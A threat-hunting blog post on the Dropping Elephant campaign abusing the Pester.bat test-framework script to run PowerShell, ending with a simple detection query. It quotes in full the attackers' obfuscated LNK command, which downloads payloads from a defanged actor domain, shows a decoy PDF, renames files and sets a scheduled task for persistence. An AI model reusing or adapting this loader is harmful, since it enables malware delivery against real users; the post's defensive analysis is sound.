207. Dropping Elephant Misuses Pester to Execute Malicious PowerShell Commands

Hello everyone!

Let's look at how adversaries leverage the following technique - System Script Proxy Execution (T1216). But we need an example, of course. And we have it! Dropping Elephant campaign againts Turkish defense contractors described by Arctic Wolf.

Once again the threat actors used malicious LNK files. And this time they abused Pester.bat to execute malicious PowerShell commands:

"C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" ;powershell s''l''eep 1;$ProgressPreference = 'SilentlyContinue';$a='https:';$b='C:\Users\';$c='C:\Windows\';wg''et $a//expouav[.]org/download/fetch/list3/12717/view/0d5a0411-0a85-42cf-928c-dd9218019f3b -OutFile $b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf;s''ap''s "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf";wg''et $a//expouav[.]org/download/fetch/list7/40275/view/e49c7ae0-f3d1-4073-83bb-b4ecba929fec -Outfile $c\Tasks\lama;r''e''n -Path "$c\Tasks\lama" -NewName "$c\Tasks\vlc.pepxpe";r''e''n -Path "$c\Tasks\vlc.pepxpe" -NewName ((Split-Path "$c\Tasks\vlc.pepxpe" -Leaf) -replace "p", "");wg''et $a//expouav[.]org/download/fetch/list5/19577/view/b5aaa6f0-6259-4ccb-b31a-d21e40c2eeff -Outfile $c\Tasks\lake;r''e''n -Path "$c\Tasks\lake" -NewName "$c\Tasks\libvlc.pdplpl";r''e''n -Path "$c\Tasks\libvlc.pdplpl" -NewName ((Split-Path "$c\Tasks\libvlc.pdplpl" -Leaf) -replace "p", "");wg''et $a//expouav[.]org/download/fetch/list6/41568/view/701bbff4-8fcb-4e9c-8577-00aed06d8443 -Outfile $c\Tasks\dalai;r''e''n -Path "$c\Tasks\dalai" -NewName "$c\Tasks\Winver.pepxpe";r''e''n -Path "$c\Tasks\Winver.pepxpe" -NewName ((Split-Path "$c\Tasks\Winver.pepxpe" -Leaf) -replace "p", "");c''p''i "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf" -destination .;wg''et $a//expouav[.]org/download/fetch/list8/20041/view/c6795195-6e84-4720-9420-e03da09b2187 -OutFile $c\Tasks\vlc.log;$d="$c\Tasks\Winver";s''ap''s $d -a "/Create", '/sc', 'minute', '/tn', 'NewErrorReport', '/tr', "$c\Tasks\vlc", '/f';e''r''a''s''e *d?.?n?

Pester.bat is not inherently a malicious tool. It’s typically associated with PowerShell's testing framework called Pester, which is a legitimate open-source module used for running unit tests in PowerShell scripts.

As it's usually not very commonly used, we can build a simple hunting query:

event_type: "processcreatewin"

AND

proc_file_path: "cmd.exe"

AND

cmdline: "pester.bat"

See you tomorrow! 

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge